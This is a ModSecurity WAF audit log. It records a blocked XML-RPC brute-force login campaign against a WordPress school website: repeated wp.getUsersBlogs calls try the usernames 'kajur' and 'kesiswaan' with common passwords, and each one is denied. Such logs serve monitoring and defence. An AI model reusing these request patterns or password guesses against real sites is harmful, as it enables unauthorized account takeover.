Stopwatch: 1744778455602389 4391 (- - -)
Stopwatch2: 1744778455602389 4391; combined=3303, p1=340, p2=2795, p3=0, p4=0, p5=98, sr=79, sw=70, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--0cf6c574-Z--
--5cfad657-A--
[16/Apr/2025:11:41:55 +0700] Z_81Exk9XPLR9cFiTEvFFAAAAAk 103.236.140.4 41758 103.236.140.4 8181
--5cfad657-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 14.18.90.195
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 14.18.90.195
X-Forwarded-Proto: http
Connection: close
Content-Length: 223
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--5cfad657-C--
wp.getUsersBlogs
kajur
Pakarmy@0882
--5cfad657-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--5cfad657-E--
--5cfad657-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.90.195 (140+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1744778515135332 4289 (- - -)
Stopwatch2: 1744778515135332 4289; combined=3249, p1=346, p2=2735, p3=0, p4=0, p5=98, sr=78, sw=70, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--5cfad657-Z--
--bb021b37-A--
[16/Apr/2025:11:42:55 +0700] Z_81Txk9XPLR9cFiTEvFmwAAAAQ 103.236.140.4 42040 103.236.140.4 8181
--bb021b37-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 14.18.90.195
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 14.18.90.195
X-Forwarded-Proto: http
Connection: close
Content-Length: 219
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--bb021b37-C--
wp.getUsersBlogs
kajur
trustno1
--bb021b37-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--bb021b37-E--
--bb021b37-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.90.195 (136+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1744778575320732 4264 (- - -)
Stopwatch2: 1744778575320732 4264; combined=3243, p1=358, p2=2702, p3=0, p4=0, p5=106, sr=83, sw=77, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--bb021b37-Z--
--73262517-A--
[16/Apr/2025:11:43:55 +0700] Z_81i0-sESiKFppgz04fYQAAAMo 103.236.140.4 42340 103.236.140.4 8181
--73262517-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 14.18.90.195
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 14.18.90.195
X-Forwarded-Proto: http
Connection: close
Content-Length: 217
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--73262517-C--
wp.getUsersBlogs
kajur
123asd
--73262517-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--73262517-E--
--73262517-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.90.195 (149+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1744778635035556 4844 (- - -)
Stopwatch2: 1744778635035556 4844; combined=3591, p1=397, p2=3010, p3=0, p4=0, p5=106, sr=84, sw=78, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--73262517-Z--
--66ec3b58-A--
[16/Apr/2025:11:44:55 +0700] Z_81x0-sESiKFppgz04f1AAAAMk 103.236.140.4 42646 103.236.140.4 8181
--66ec3b58-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 14.18.90.195
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 14.18.90.195
X-Forwarded-Proto: http
Connection: close
Content-Length: 222
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--66ec3b58-C--
wp.getUsersBlogs
kajur
123@QWE@POI
--66ec3b58-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--66ec3b58-E--
--66ec3b58-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.90.195 (148+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1744778695172226 3924 (- - -)
Stopwatch2: 1744778695172226 3924; combined=2968, p1=341, p2=2475, p3=0, p4=0, p5=88, sr=79, sw=64, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--66ec3b58-Z--
--c1fdb851-A--
[16/Apr/2025:11:45:41 +0700] Z_819ZVnVduWmh0dMDMYHgAAAII 103.236.140.4 42872 103.236.140.4 8181
--c1fdb851-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 14.18.90.195
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 14.18.90.195
X-Forwarded-Proto: http
Connection: close
Content-Length: 219
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--c1fdb851-C--
wp.getUsersBlogs
kajur
1234%^&*
--c1fdb851-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--c1fdb851-E--
--c1fdb851-H--
Message: XML parser error: XML: Failed parsing document.
Message: Warning. Match of "eq 0" against "REQBODY_ERROR" required. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "27"] [id "210230"] [rev "2"] [msg "COMODO WAF: The request body could not be parsed. Possibility of an impedance mismatch attack. This is not a false positive.||smkn22-jkt.sch.id|F|2"] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1744778741662940 4211 (- - -)
Stopwatch2: 1744778741662940 4211; combined=3242, p1=390, p2=2684, p3=0, p4=0, p5=99, sr=79, sw=69, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--c1fdb851-Z--
--d830b803-A--
[16/Apr/2025:11:45:55 +0700] Z_82A5VnVduWmh0dMDMYOwAAAIE 103.236.140.4 42930 103.236.140.4 8181
--d830b803-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 14.18.90.195
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 14.18.90.195
X-Forwarded-Proto: http
Connection: close
Content-Length: 220
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--d830b803-C--
wp.getUsersBlogs
kajur
P@ssw0rd3
--d830b803-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--d830b803-E--
--d830b803-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.90.195 (139+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1744778755086836 4406 (- - -)
Stopwatch2: 1744778755086836 4406; combined=3299, p1=345, p2=2761, p3=0, p4=0, p5=109, sr=77, sw=84, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--d830b803-Z--
--93c59e5f-A--
[16/Apr/2025:11:46:55 +0700] Z_82Pype92T0H9-Aa0y-LwAAAEI 103.236.140.4 43236 103.236.140.4 8181
--93c59e5f-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 14.18.90.195
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 14.18.90.195
X-Forwarded-Proto: http
Connection: close
Content-Length: 217
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--93c59e5f-C--
wp.getUsersBlogs
kajur
nathan
--93c59e5f-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--93c59e5f-E--
--93c59e5f-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.90.195 (147+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1744778815131981 4666 (- - -)
Stopwatch2: 1744778815131981 4666; combined=3619, p1=382, p2=2903, p3=0, p4=0, p5=180, sr=79, sw=154, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--93c59e5f-Z--
--b013eb37-A--
[16/Apr/2025:11:47:55 +0700] Z_82e5VnVduWmh0dMDMYkAAAAJI 103.236.140.4 43524 103.236.140.4 8181
--b013eb37-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 14.18.90.195
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 14.18.90.195
X-Forwarded-Proto: http
Connection: close
Content-Length: 219
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--b013eb37-C--
wp.getUsersBlogs
kajur
rangers1
--b013eb37-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--b013eb37-E--
--b013eb37-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.90.195 (140+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1744778875071470 4095 (- - -)
Stopwatch2: 1744778875071470 4095; combined=3163, p1=354, p2=2627, p3=0, p4=0, p5=103, sr=83, sw=79, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--b013eb37-Z--
--411ea83a-A--
[16/Apr/2025:11:48:55 +0700] Z_82type92T0H9-Aa0y-iQAAAFM 103.236.140.4 43806 103.236.140.4 8181
--411ea83a-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 14.18.90.195
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 14.18.90.195
X-Forwarded-Proto: http
Connection: close
Content-Length: 221
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--411ea83a-C--
wp.getUsersBlogs
kesiswaan
000000
--411ea83a-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--411ea83a-E--
--411ea83a-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.90.195 (140+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1744778935141249 4257 (- - -)
Stopwatch2: 1744778935141249 4257; combined=3256, p1=343, p2=2749, p3=0, p4=0, p5=96, sr=79, sw=68, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--411ea83a-Z--
--4221235d-A--
[16/Apr/2025:11:49:55 +0700] Z_8285VnVduWmh0dMDMY9QAAAII 103.236.140.4 44120 103.236.140.4 8181
--4221235d-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 14.18.90.195
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 14.18.90.195
X-Forwarded-Proto: http
Connection: close
Content-Length: 232
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--4221235d-C--
wp.getUsersBlogs
kesiswaan
kesiswaanPassword
--4221235d-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--4221235d-E--
--4221235d-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.90.195 (146+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1744778995070738 4334 (- - -)
Stopwatch2: 1744778995070738 4334; combined=3325, p1=354, p2=2804, p3=0, p4=0, p5=97, sr=82, sw=70, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--4221235d-Z--
--ffd3987f-A--
[16/Apr/2025:11:50:55 +0700] Z_83L5VnVduWmh0dMDMZJgAAAJQ 103.236.140.4 44416 103.236.140.4 8181
--ffd3987f-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 14.18.90.195
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 14.18.90.195
X-Forwarded-Proto: http
Connection: close
Content-Length: 221
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--ffd3987f-C--
wp.getUsersBlogs
kesiswaan
123789
--ffd3987f-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--ffd3987f-E--
--ffd3987f-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.90.195 (147+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1744779055035012 4685 (- - -)
Stopwatch2: 1744779055035012 4685; combined=3474, p1=391, p2=2883, p3=0, p4=0, p5=113, sr=111, sw=87, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--ffd3987f-Z--
--012f4467-A--
[16/Apr/2025:11:51:55 +0700] Z_83aype92T0H9-Aa0y_UQAAAEc 103.236.140.4 44732 103.236.140.4 8181
--012f4467-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 14.18.90.195
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 14.18.90.195
X-Forwarded-Proto: http
Connection: close
Content-Length: 225
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--012f4467-C--
wp.getUsersBlogs
kesiswaan
user123456
--012f4467-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--012f4467-E--
--012f4467-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.90.195 (152+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1744779115122257 4255 (- - -)
Stopwatch2: 1744779115122257 4255; combined=3215, p1=355, p2=2693, p3=0, p4=0, p5=97, sr=78, sw=70, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--012f4467-Z--
--e301dc19-A--
[16/Apr/2025:11:52:40 +0700] Z_83mJVnVduWmh0dMDMZhwAAAIA 103.236.140.4 44944 103.236.140.4 8181
--e301dc19-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 14.18.90.195
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 14.18.90.195
X-Forwarded-Proto: http
Connection: close
Content-Length: 223
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--e301dc19-C--
wp.getUsersBlogs
kesiswaan
1234%^&*
--e301dc19-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--e301dc19-E--
--e301dc19-H--
Message: XML parser error: XML: Failed parsing document.
Message: Warning. Match of "eq 0" against "REQBODY_ERROR" required. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "27"] [id "210230"] [rev "2"] [msg "COMODO WAF: The request body could not be parsed. Possibility of an impedance mismatch attack. This is not a false positive.||smkn22-jkt.sch.id|F|2"] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1744779160413721 4229 (- - -)
Stopwatch2: 1744779160413721 4229; combined=3271, p1=340, p2=2765, p3=0, p4=0, p5=98, sr=76, sw=68, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--e301dc19-Z--
--55a9167e-A--
[16/Apr/2025:11:52:55 +0700] Z_83p5VnVduWmh0dMDMZkAAAAIo 103.236.140.4 45018 103.236.140.4 8181
--55a9167e-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 14.18.90.195
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 14.18.90.195
X-Forwarded-Proto: http
Connection: close
Content-Length: 223
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--55a9167e-C--
wp.getUsersBlogs
kesiswaan
z1x2c3v4
--55a9167e-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--55a9167e-E--
--55a9167e-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.90.195 (140+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1744779175343713 4359 (- - -)
Stopwatch2: 1744779175343713 4359; combined=3393, p1=357, p2=2834, p3=0, p4=0, p5=115, sr=82, sw=87, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--55a9167e-Z--
--c630b37d-A--
[16/Apr/2025:11:53:55 +0700] Z_834ype92T0H9-Aa0y_zwAAAEs 103.236.140.4 45328 103.236.140.4 8181
--c630b37d-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 14.18.90.195
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 14.18.90.195
X-Forwarded-Proto: http
Connection: close
Content-Length: 225
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--c630b37d-C--
wp.getUsersBlogs
kesiswaan
tinkerbell
--c630b37d-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--c630b37d-E--
--c630b37d-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.90.195 (143+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1744779235186020 4278 (- - -)
Stopwatch2: 1744779235186020 4278; combined=3335, p1=372, p2=2797, p3=0, p4=0, p5=96, sr=96, sw=70, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--c630b37d-Z--
--79f82506-A--
[16/Apr/2025:11:54:55 +0700] Z_84Hxk9XPLR9cFiTEvG2wAAABI 103.236.140.4 45658 103.236.140.4 8181
--79f82506-B--
